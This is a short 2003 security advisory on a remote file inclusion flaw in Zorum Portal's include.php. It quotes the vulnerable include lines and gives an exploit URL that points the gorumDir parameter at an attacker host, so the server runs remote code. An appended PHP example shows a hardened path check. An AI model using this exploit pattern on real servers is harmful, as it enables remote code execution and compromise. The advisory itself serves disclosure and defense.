BugTraq
Zorum Portal (PHP) Jan 22 2003 07:45PM
MGhz (magas mail lt)


Version : 3.0;3.1;3.2

Website : http://zorum.phpoutsourcing.com/

Problem : Include file

File:

---------------------------------

include.php

---------------------------------

PHP Code:

---------------------------------

[...]

include("$gorumDir/generformlib_multipleselection.php");

include("$gorumDir/generformlib_groupselection.php");

include("$gorumDir/generformlib_filebutton.php");

include("$gorumDir/group.php");

[...]

---------------------------------

Exploit :

---------------------------------

http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/

Result: include.php includes http://[attacker]/group.php from the remote server.

---------------------------------

--

magas (at) mail (dot) lt
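A hardened way to resolve the files that include.php loads, as an added example that is not Zorum's code or part of the original post: the base directory is assigned in code instead of arriving through the `gorumDir` request parameter, and each file must resolve inside it. The function name `gorum_path` and the temp-directory layout are assumptions made for illustration.

```php
<?php
// Added example, not Zorum's code. Assumption: the library files live in one
// fixed local directory; a constructed temp directory stands in for it here.

// Return the real path of a library file under $base, or throw.
// $base must be assigned in code before any include, never read from the request.
function gorum_path(string $base, string $file): string
{
    // Bare file names only: no slashes, no "..", no scheme such as http://
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $file)) {
        throw new InvalidArgumentException("rejected file name");
    }
    // realpath() only resolves local paths; a URL or missing directory gives false
    $root = realpath($base);
    if ($root === false || !is_dir($root)) {
        throw new RuntimeException("base is not a local directory");
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $path = realpath($prefix . $file);
    // Symlinks are resolved by now, so check the result is still under $root
    if ($path === false || strpos($path, $prefix) !== 0) {
        throw new RuntimeException("file is outside the library directory");
    }
    return $path;
}

// Constructed demo data: a temp directory holding a stub group.php
$gorumDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gorum_demo_' . getmypid();
mkdir($gorumDir);
file_put_contents($gorumDir . DIRECTORY_SEPARATOR . 'group.php', "<?php\n");

include gorum_path($gorumDir, 'group.php');   // local library file: loaded
echo "loaded group.php from the fixed directory\n";

// A base shaped like the advisory's request parameter is refused, not fetched
try {
    include gorum_path('http://[attacker]/', 'group.php');
} catch (RuntimeException $e) {
    echo "refused: ", $e->getMessage(), "\n";
}

unlink($gorumDir . DIRECTORY_SEPARATOR . 'group.php');
rmdir($gorumDir);
```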
